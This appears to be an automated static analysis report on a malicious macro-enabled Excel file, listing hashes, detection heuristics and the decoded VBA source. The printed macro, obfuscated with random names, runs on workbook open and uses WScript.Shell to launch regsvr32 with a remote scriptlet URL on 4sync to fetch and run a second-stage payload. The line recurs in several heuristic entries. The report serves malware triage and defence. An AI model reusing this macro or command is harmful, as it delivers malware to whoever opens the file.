Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 4b6ba0c7186caa43…

MALICIOUS

Office (OOXML)

16.5 KB Created: 2021-07-01 20:45:14 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-07-10
MD5: ca2a1e8a3c562d91a42636ac16924544 SHA-1: 6beea994992fa8e54ff2ee8080d83f479652c6f4 SHA-256: 4b6ba0c7186caa43e98b8c38650b8ebcf22a1c0565857d43f8da341ff9c7d8b2
390 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a macro-enabled Excel document containing a Workbook_Open macro that utilizes WScript.Shell and CreateObject to execute commands. The VBA code appears to be obfuscated but strongly suggests an attempt to download and execute a second-stage payload, likely leveraging a LOLBin. The presence of a URL, although marked as benign, indicates a potential download vector.

Heuristics 9

  • ClamAV: Xls.Malware.Valyria-10036329-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036329-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        .Filters.Add "Excel Files", "*.BzeRsdRsBBTHS; *.HPUPAeuXerdwQXvKuanydVPRVscKtLbXoIGbBGkWSkviIJUeAzMkNDKLZdTecIGyohXk; *.scrTucsPTHJXUGFHFHkJA; *.ToPpUbNMHHaSOeohCNZAKbYnLkQBsXoIOXyHdDJzo; *.rrNGpbsnksaYMHrLcSCEHEIUJEPMuOZwcunLzXzCrPRofXhCkpRNp", 1
Set hb = CreateObject("WScript.Shell")
hb.Run ("regsvr32 /sLbzrtNvihODPHvHLoWVDQVTEtEwCJ   /nIoELBKRkWkUwvnOTfVftCUGKMKQIF   /uLbzrtNvihODPHvHLoWVDQVTEtEwCJ  /i:https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74  scrobj.dll EFJaFGtwMIvKVtVbXUsukToQcQsOB")
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    Set hb = CreateObject("WScript.Shell")
hb.Run ("regsvr32 /sLbzrtNvihODPHvHLoWVDQVTEtEwCJ   /nIoELBKRkWkUwvnOTfVftCUGKMKQIF   /uLbzrtNvihODPHvHLoWVDQVTEtEwCJ  /i:https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74  scrobj.dll EFJaFGtwMIvKVtVbXUsukToQcQsOB")
 .Show
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        .Filters.Add "Excel Files", "*.BzeRsdRsBBTHS; *.HPUPAeuXerdwQXvKuanydVPRVscKtLbXoIGbBGkWSkviIJUeAzMkNDKLZdTecIGyohXk; *.scrTucsPTHJXUGFHFHkJA; *.ToPpUbNMHHaSOeohCNZAKbYnLkQBsXoIOXyHdDJzo; *.rrNGpbsnksaYMHrLcSCEHEIUJEPMuOZwcunLzXzCrPRofXhCkpRNp", 1
Set hb = CreateObject("WScript.Shell")
hb.Run ("regsvr32 /sLbzrtNvihODPHvHLoWVDQVTEtEwCJ   /nIoELBKRkWkUwvnOTfVftCUGKMKQIF   /uLbzrtNvihODPHvHLoWVDQVTEtEwCJ  /i:https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74  scrobj.dll EFJaFGtwMIvKVtVbXUsukToQcQsOB")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Workbook_Open()
For RJXXWPdC = 1 To AOPKwSQ
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74 In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6478 bytes
SHA-256: 6f4c29f3b7d1f5fafb7dbaeab18747ab67633a7349679b30a91cd25691d36c80
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
For RJXXWPdC = 1 To AOPKwSQ
    PEBO = OLapifJiIyXLdIpBHd.LfokwMQH(1).Range("IIWWUXBaSHJYLPYkedRNIb" & RJXXWPdC).Value
    OFFbYGco = OLapifJiIyXLdIpBHd.LfokwMQH(1).Range("ffTTPVRaKdiWtEVAkfJAhfaeHNJCZiWaWFSPyZYKAAOTVViiKIiORsTaeQtdt" & RJXXWPdC).Value
    Select Case True
        Case PEBO = "REWDkhnJIsJsBUCJCaGNwapwevhtn:": OLapifJiIyXLdIpBHd.LfokwMQH(1).Range("IIWWUXBaSHJYLPYkedRNIb" & RJXXWPdC & ":ffTTPVRaKdiWtEVAkfJAhfaeHNJCZiWaWFSPyZYKAAOTVViiKIiORsTaeQtdt" & RJXXWPdC).Font.Bold = True
        Case InStr(1, PEBO, "CnXIJPwnushzTfIzfWsVswsTsXsLFpTkDctGCRuJbGYnVQaCHBKVLLtvYdvL: ")
            OLapifJiIyXLdIpBHd.LfokwMQH(1).Range("IIWWUXBaSHJYLPYkedRNIb" & RJXXWPdC & ":OJfsfEYNpfRNkZGZNeQSzCLSBiHcwAMfRTVcefQFDtJuYoMfFeNBbUpuXuVYW" & RJXXWPdC).Interior.ColorIndex = 15
            OLapifJiIyXLdIpBHd.LfokwMQH(1).Range("IIWWUXBaSHJYLPYkedRNIb" & RJXXWPdC).Font.Bold = True
        Case InStr(1, OFFbYGco, "IIWWUXBaSHJYLPYkedRNIb"): OLapifJiIyXLdIpBHd.LfokwMQH(1).Range("ffTTPVRaKdiWtEVAkfJAhfaeHNJCZiWaWFSPyZYKAAOTVViiKIiORsTaeQtdt" & RJXXWPdC & ":ffTTPVRaKdiWtEVAkfJAhfaeHNJCZiWaWFSPyZYKAAOTVViiKIiORsTaeQtdt" & (RJXXWPdC + 2)).Interior.ColorIndex = 37
        Case InStr(1, OFFbYGco, "ffTTPVRaKdiWtEVAkfJAhfaeHNJCZiWaWFSPyZYKAAOTVViiKIiORsTaeQtdt"): OLapifJiIyXLdIpBHd.LfokwMQH(1).Range("ffTTPVRaKdiWtEVAkfJAhfaeHNJCZiWaWFSPyZYKAAOTVViiKIiORsTaeQtdt" & RJXXWPdC & ":ffTTPVRaKdiWtEVAkfJAhfaeHNJCZiWaWFSPyZYKAAOTVViiKIiORsTaeQtdt" & (RJXXWPdC + 2)).Interior.ColorIndex = 3
        Case InStr(1, OFFbYGco, "dSKnEbuBBEzIAMIoJKYZDFiALGDrV"): OLapifJiIyXLdIpBHd.LfokwMQH(1).Range("ffTTPVRaKdiWtEVAkfJAhfaeHNJCZiWaWFSPyZYKAAOTVViiKIiORsTaeQtdt" & RJXXWPdC & ":ffTTPVRaKdiWtEVAkfJAhfaeHNJCZiWaWFSPyZYKAAOTVViiKIiORsTaeQtdt" & (RJXXWPdC + 2)).Interior.Color = RGB(50, 205, 50)
    End Select
Next RJXXWPdC
Application.DisplayAlerts = False
With Application.FileDialog(msoFileDialogFilePicker)
      .AllowMultiSelect = False
    'CHcMiwyDiQOrkEByeIGfhHdnSJvdrBX  oPindkSw RJXXWPdC  LfokwMQH
    .Filters.Add "Excel Files", "*.BzeRsdRsBBTHS; *.HPUPAeuXerdwQXvKuanydVPRVscKtLbXoIGbBGkWSkviIJUeAzMkNDKLZdTecIGyohXk; *.scrTucsPTHJXUGFHFHkJA; *.ToPpUbNMHHaSOeohCNZAKbYnLkQBsXoIOXyHdDJzo; *.rrNGpbsnksaYMHrLcSCEHEIUJEPMuOZwcunLzXzCrPRofXhCkpRNp", 1
Set hb = CreateObject("WScript.Shell")
hb.Run ("regsvr32 /sLbzrtNvihODPHvHLoWVDQVTEtEwCJ   /nIoELBKRkWkUwvnOTfVftCUGKMKQIF   /uLbzrtNvihODPHvHLoWVDQVTEtEwCJ  /i:https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74  scrobj.dll EFJaFGtwMIvKVtVbXUsukToQcQsOB")
 .Show
 'CnXIJPwnushzTfIzfWsVswsTsXsLFpTkDctGCRuJbGYnVQaCHBKVLLtvYdvL IIWWUXBaSHJYLPYkedRNIb IIWWUXBaSHJYLPYkedRNIb /nIoELBKRkWkUwvnOTfVftCUGKMKQIF oPindkSw IIWWUXBaSHJYLPYkedRNIb IIWWUXBaSHJYLPYkedRNIb IIWWUXBaSHJYLPYkedRNIb oPindkSw

End With
If InStr(fullpath, ".scrTucsPTHJXUGFHFHkJA") = 0 Then
 
    Exit Sub
End If
Set ws = Workbooks.Open(fullpath)
Set wb = Workbooks.Add
ws.LfokwMQH(1).UsedRange.Copy Destination:=wb.LfokwMQH("iAwRTCaVOhhyVFOXaKhGHEJtJvGeXzUrupkHKJOsefUzFecOMHEecFNIRSiH").Range("IIWWUXBaSHJYLPYkedRNIb" & Rows.DMJrHsyYYHsLHVWOsIkFf).End(xlUp)
wb.LfokwMQH("iAwRTCaVOhhyVFOXaKhGHEJtJvGeXzUrupkHKJOsefUzFecOMHEecFNIRSiH").Range("USPJVYzF").Value = "Status"
lRow = wb.LfokwMQH("iAwRTCaVOhhyVFOXaKhGHEJtJvGeXzUrupkHKJOsefUzFecOMHEecFNIRSiH").Cells(Rows.DMJrHsyYYHsLHVWOsIkFf, 1).End(xlUp).Row
For OddwpiRuGMFwUfHkWEZyckrIzeJwr = 2 To lRow
    If wb.LfokwMQH("iAwRTCaVOhhyVFOXaKhGHEJtJvGeXzUrupkHKJOsefUzFecOMHEecFNIRSiH").Range("H" & OddwpiRuGMFwUfHkWEZyckrIzeJwr).Value = 0 And wb.LfokwMQH(1).Range("I" & OddwpiRuGMFwUfHkWEZyckrIzeJwr).Value = 0 Then
        wb.LfokwMQH("iAwRTCaVOhhyVFOXaKhGHEJtJvGeXzUrupkHKJOsefUzFecOMHEecFNIRSiH").Range("OddwpiRuGMFwUfHkWEZyckrIzeJwr" & OddwpiRuGMFwUfHkWEZyckrIzeJwr).Value = "dSKnEbuBBEzIAMIoJKYZDFiALGDrV"
    Else
        wb.LfokwMQH("iAwRTCaVOhhyVFOXaKhGHEJtJvGeXzUrupkHKJOsefUzFecOMHEecFNIRSiH").Range("OddwpiRuGMFwUfHkWEZyckrIzeJwr" & OddwpiRuGMFwUfHkWEZyckrIzeJwr).Value = "dSKnEbuBBEzIAMIoJKYZDFiALGDrV"
    End If
Next OddwpiRuGMFwUfHkWEZyckrIzeJwr
wb.LfokwMQH("iAwRTCaVOhhyVFOXaKhGHEJtJvGeXzUrupkHKJOsefUzFecOMHEecFNIRSiH").Range("yVGpXaSFsukRCGnyttaFzBSJpMUPyPTPCDdOITM:USPJVYzF").AutoFilter _
    Field:=4, _
    Criteria1:=Array("EN", "EN/aHBbHQaSb", "FF", "FF/aHBbHQaSb", "hsizoHIePRDHfQvAZTBhEbWYssRvuGAdhoNZTzDTcLuSUuHFhfBLwooezpdWQ", "hsizoHIePRDHfQvAZTBhEbWYssRvuGAdhoNZTzDTcLuSUuHFhfBLwooezpdWQ/aHBbHQaSb"), _
    Operator:=xlFilterValues
    'NNQQKTibCJQUX
    wb.LfokwMQH("iAwRTCaVOhhyVFOXaKhGHEJtJvGeXzUrupkHKJOsefUzFecOMHEecFNIRSiH").Range("yVGpXaSFsukRCGnyttaFzBSJpMUPyPTPCDdOITM:USPJVYzF").AutoFilter _
    Field:=5, _
    Criteria1:=Array("1", "2", "3", "4", "5", "6", "7"), _
    Operator:=xlFilterValues
    'CnXIJPwnushzTfIzfWsVswsTsXsLFpTkDctGCRuJbGYnVQaCHBKVLLtvYdvL
    
End With

With wb.LfokwMQH("WoODEeVveBFMBDANBLBIzWAABPyOkRAObkCnWwfFer").PivotTables(1).PivotFields("tdORyWisXkFZwHsEcfwovAwKKfDyD")
.Orientation = xlDataField
.Name = "ntharPRYfZonLKBPtHLOUsbNFWPKPOKSWahsPDvGnyXIyefcAfInosBXsyA"
.NumberFormat = "ntharPRYfZonLKBPtHLOUsbNFWPKPOKSWahsPDvGnyXIyefcAfInosBXsyA"
.Function = xlCount
.Calculation = xlPercentOfRow
End With
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 23040 bytes
SHA-256: 3dee1c5d7d8c555f7955eeb782ecd5345c6793e29f4469a6c770deae8948c649
Detection
ClamAV: Xls.Malware.Valyria-10036329-0
Obfuscation or payload: likely
153 of 282 identifiers look randomly generated (e.g. 'YcURONBZuZuWvMSfzsIPzFehzYQKJQeVCRABHtdA') — consistent with name-mangling obfuscation.

Open this report in the interactive analyzer, or submit your own file for analysis.